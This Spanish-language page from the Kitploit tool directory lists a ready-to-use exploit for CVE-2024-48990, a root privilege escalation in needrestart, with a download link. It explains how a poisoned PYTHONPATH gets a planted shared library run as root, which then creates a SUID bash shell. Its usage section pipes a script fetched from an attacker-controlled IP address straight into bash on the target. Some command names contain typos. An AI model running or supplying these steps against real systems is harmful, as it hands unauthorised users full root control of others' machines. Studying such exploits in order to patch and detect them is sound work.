Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/mladicstefan/cve-2024-48990
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubmladicstefan/cve-2024-48990

CVE-2024-48990

Exploit completo para needsrestart shell setuid root

Ver Repositorio
8hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit CVE-2024-48990

Escalada de Privilegios Local en needrestart < 3.8 mediante inyección de PYTHONPATH.

Cómo Funciona

  1. needrestart se ejecuta como root y escanea todos los procesos
  2. Encuentra nuestro proceso Python, lee PYTHONPATH=/tmp/.m desde /proc/[pid]/environ
  3. Ejecuta Python como root con nuestro PYTHONPATH malicioso
  4. La importación de Python carga /tmp/.m/importlib/__init__.so (nuestra biblioteca maliciosa)
  5. El constructor en .so se ejecuta como root antes de que Python siquiera inicie
  6. Crea una bash SUID en /tmp/rootbash
  7. Ejecuta /tmp/rootbash -p para obtener una shell root

Punto Clave: needrestart confía en las variables de entorno de procesos no privilegiados y las usa al ejecutar intérpretes como root.

Uso

Atacante:

root@kitploit:~
./compile.sh
python3 -m http.server 8000

Objetivo:

root@kitploit:~
curl -sf http://10.10.14.109:8000/setup_exploit.sh | bash -s 10.10.14.109 8000
cd /tmp/.m && PYTHONPATH=/tmp/.m python3 e.py

El proceso e.py debería quedarse en espera y generar una shell root una vez que se ejecute lo siguiente desde un segundo terminal:

root@kitploit:~
sudo needsrestard

el primer terminal iniciará una shell root

Créditos

Qualys Threat Research Unit - CVE-2024-48990

Descargar herramienta